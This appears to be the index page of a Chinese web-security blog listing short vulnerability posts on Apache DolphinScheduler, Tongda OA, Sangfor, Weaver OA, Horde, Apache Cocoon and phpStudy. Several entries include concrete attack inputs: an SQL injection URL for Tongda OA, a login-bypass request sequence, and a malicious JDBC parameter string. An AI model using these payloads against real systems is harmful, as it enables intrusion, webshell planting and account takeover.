Posted 2020-09-17Updated 2021-03-03Updated 2021-03-03WEB安全3 minutes read (About 393 words)

Apache DolphinScheduler远程代码执行(CVE-2020-11974)

Apache DolphinScheduler组件介绍

Apache DolphinScheduler(incubator,原EasyScheduler）是一个分布式工作流任务调度系统，主要解决数据研发ETL错综复杂的依赖关系，不能直观监控任务健康状态。DolphinScheduler以DAG流式的方式将Task组装起来，可实时监控任务的运行状态，同时支持重试、从指定节点恢复失败、暂停及Kill任务等操作。

漏洞描述

CVE-2020-11974与mysql connectorj远程执行代码漏洞有关，在选择mysql作为数据库时，攻击者可通过jdbc connect参数输入{“detectCustomCollations”:true，“autoDeserialize”:true} 在DolphinScheduler 服务器上远程执行代码。

影响版本

受影响版本
Apache DolphinScheduler = 1.2.0、1.2.1

安全版本
Apache DolphinScheduler >= 1.3.1

Apache

Posted 2020-09-17Updated 2021-03-03Updated 2021-03-03WEB安全a minute read (About 140 words)

Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)

漏洞描述

发现的漏洞是任何租户下的普通用户都可以通过以下方式覆盖其他用户的密码
api interface /dolphinscheduler/users/update

受影响的版本

受影响版本
Apache DolphinScheduler = 1.2.0、1.2.1、1.3.1

安全版本
Apache DolphinScheduler >= 1.3.2

Apache

Posted 2020-09-17Updated 2021-03-03Updated 2021-03-03WEB安全2 minutes read (About 367 words)

通达OA v11.7 后台SQL注入

利用条件

需要登录权限

原文作者给出了利用链注入加mysql权限，又是写木马的。用起来很舒服

/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))

通达OA

Posted 2020-09-17Updated 2021-03-03Updated 2021-03-03WEB安全a minute read (About 119 words)

深信服 SSL VPN - Pre Auth 修改绑定手机

漏洞起因：

sangfor, VPN

Posted 2020-09-17Updated 2021-03-03Updated 2021-03-03WEB安全2 minutes read (About 355 words)

深信服EDR3.2.21 任意代码执行漏洞分析

漏洞原理

dev_linkage_launch.php 为设备联动的新入口点主要是将联动的接口构造成业务统一处理的接口

sangfor, EDR

Posted 2020-09-15Updated 2021-03-03Updated 2021-03-03WEB安全a few seconds read (About 77 words)

通达OA任意用户登陆

1、首先访问 /ispirit/login_code.php 获取 codeuid。

2、访问 /general/login_code_scan.php 提交 post 参数：

uid=1&codeuid={9E908086-342B-2A87-B0E9-E573E226302A}

通达OA

Posted 2020-09-14Updated 2021-03-03Updated 2021-03-03WEB安全3 minutes read (About 387 words)

泛微OA云桥任意文件读取和目录遍历漏洞

未授权任意文件读取,/wxjsapi/saveYZJFile接口获取filepath,输入文件路径->读取文件内容。返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。

泛微OA

Posted 2020-09-14Updated 2021-03-03Updated 2021-03-03WEB安全6 minutes read (About 888 words)

Horde Groupware Webmail Edition 远程命令执行

Python Exp：

Horde Groupware Webmail Edition

Posted 2020-09-14Updated 2021-03-03Updated 2021-03-03WEB安全a minute read (About 144 words)

Apache Cocoon XML注入 (CVE-2020-11991)

程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。

Apache-Cocoon-XML

Posted 2020-09-14Updated 2021-03-03Updated 2021-03-03WEB安全4 minutes read (About 635 words)

phpStudy(小皮面板)v8.1.0.7 nginx 解析漏洞

一、**phpStudy**(小皮面板)简介：
phpStudy v8.1.0.7.png

phpStudy国内12年老牌公益软件，集安全，高效，功能与一体，已获得全球用户认可安装，运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。

PhpStudy, nginx解析漏洞

Apache DolphinScheduler远程代码执行(CVE-2020-11974)

Apache DolphinScheduler组件介绍

漏洞描述

影响版本

Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)

漏洞描述

受影响的版本

通达OA v11.7 后台SQL注入

利用条件

深信服 SSL VPN - Pre Auth 修改绑定手机

漏洞起因：

深信服EDR3.2.21 任意代码执行漏洞分析

漏洞原理

通达OA任意用户登陆

泛微OA云桥任意文件读取和目录遍历漏洞

Horde Groupware Webmail Edition 远程命令执行

Apache Cocoon XML注入 (CVE-2020-11991)

phpStudy(小皮面板)v8.1.0.7 nginx 解析漏洞

Links

Categories

Recents

Tags

Subscribe for updates

Advertisement